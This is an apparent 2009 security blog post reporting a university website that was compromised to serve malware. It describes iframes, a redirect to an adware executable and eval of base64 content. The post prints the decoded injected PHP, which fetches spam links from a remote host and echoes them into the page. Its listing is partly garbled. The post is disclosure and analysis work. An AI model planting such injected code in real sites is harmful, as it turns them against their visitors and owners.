Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

Couple of days back I reported the infection to few Security Researchers through OWASP. Now Firefox and Google says the same!! If we visit, Firefox browser alarms you with the following warning

Other way round to make sure whether it is service malicious pages or malware is: type "nagarjunauniversity" in google window and open the first link

Google description about the pages hosted by is

Real time view of malicious pages and Analysis
Visiting the site welcomes you with script execution, see diagram below
Viewing the source of this page will make you think for a while. Why Chinese and Russian links are present in the page?? Have a glimpse of the code.

Whe I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry? The code is still present but on other pages. When I am writin this blog base64 encoded content was present at the following pages and many more
Source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percentage encoding)
Google's description had a mention about domain.
When we open above site it gets redirected to hosts *SmartDownload.exe*

Details of the EXE at Virustotal is shown as *Win32/CasOnline!Adware*. Further details about the binary can be found at

Well, decoding the base64 content with base64_decode() method present within the malicious page gives the below script which is passed as an argument to eval(). eval executes the script


$links = new GetLinks();

echo $links->Links;
class GetLinks
var $host = "";
var $path = "/link.php?site=";
var $site = "";
var $user_agent = "";

var $Links = "";

var $_socket_timeout = 12;
var $_cashe_life_time = 3600;
var $_cashe_file = "cashe.txt";

function GetLinks()
if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();
if ($handle = fopen($this->_cashe_file, 'w')) {
fwrite($handle, $this->Links);

else {
$this->Links = file_get_contents($this->_cashe_file);

function fetch_remote_file()
$buff = '';
$fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
if (!$fp) {

} else {
$out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
$out .= "Host: {$this->host}\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
$buff .= fgets($fp, 128);
$page = explode("\r\n\r\n", $buff);
return $page[1];
I am not sure what cashe.txt does and what are its contents!
The HTML Tag which is responsible for execution of scripts, malware etc is IFRAME.
Next blog will be most probably SmartDownload.exe binary analysis. Safe Surfing!!!